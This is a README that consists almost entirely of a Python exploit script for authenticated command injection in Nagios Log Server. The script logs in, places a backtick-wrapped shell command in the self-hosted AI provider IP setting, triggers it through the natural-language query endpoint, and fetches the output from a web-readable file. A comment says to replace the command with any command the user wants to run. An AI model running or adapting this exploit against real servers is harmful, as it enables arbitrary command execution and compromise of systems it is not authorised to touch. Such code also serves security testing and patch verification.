README.md
Rendering markdown...
import requests
import sys
## Usage
# $ python3 exploit.py <nagios-logserver-url> <username> <password> <command>
host = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
cmd = sys.argv[4]
proxies = dict.fromkeys(['http','https'],'http://127.0.0.1:8080')
login_url = f'{host}nagioslogserver/login'
globals_setting_url = f'{host}nagioslogserver/admin/globals'
nlq_url = f'{host}nagioslogserver/dashboard/natural_language_to_query?query=doesntmatter'
get_output = f'{host}nagioslogserver/scripts/test.txt'
with requests.Session() as s:
s.proxies.update(proxies)
s.verify = False
csrf_req = s.get(login_url)
csrf_ls = csrf_req.cookies['csrf_ls']
login_payload = {
'csrf_ls': csrf_ls,
'username': username,
'password': password
}
login_req = s.post(login_url, data=login_payload, allow_redirects=False)
if 'ls_session' not in login_req.cookies:
print("[-] Incorrect credentials")
exit()
print(f"[+] Login worked, adding command injection to self_host_ip_address")
cmd_injection_payload = {
"csrf_ls": csrf_ls,
"natural_language_query": 1,
"nlp_disclaimer": "on",
"ai_provider": "self_hosted",
"self_host_ip_address": f"`{cmd}>/var/www/html/nagioslogserver/www/scripts/test.txt`", # This is simply to view command output. Remove and replace with any command you want to execute
"ai_port": 8000,
"saveglobals":1
}
cmd_injection_res = s.post(globals_setting_url, data=cmd_injection_payload)
if not cmd_injection_res.ok:
print(f"[-] Cmd injection probably didn't work")
exit()
if cmd not in cmd_injection_res.text:
print(f"[*] Command didn't show up in the response text, still check if it works...")
print(f"[*] Triggering command with request to natural language query endpoint {nlq_url}")
nlq_res = s.get(nlq_url)
if not nlq_res.ok:
print(f"[-] Something failed requesting {nlq_url}, check {get_output} for cmd output")
cmd_out_res = s.get(get_output)
if not cmd_injection_res.ok:
print(f"[-] No output for '{cmd}' at {get_output}")
else:
print(f"[+] Output of {cmd} located here: {get_output}")
print(cmd_out_res.text)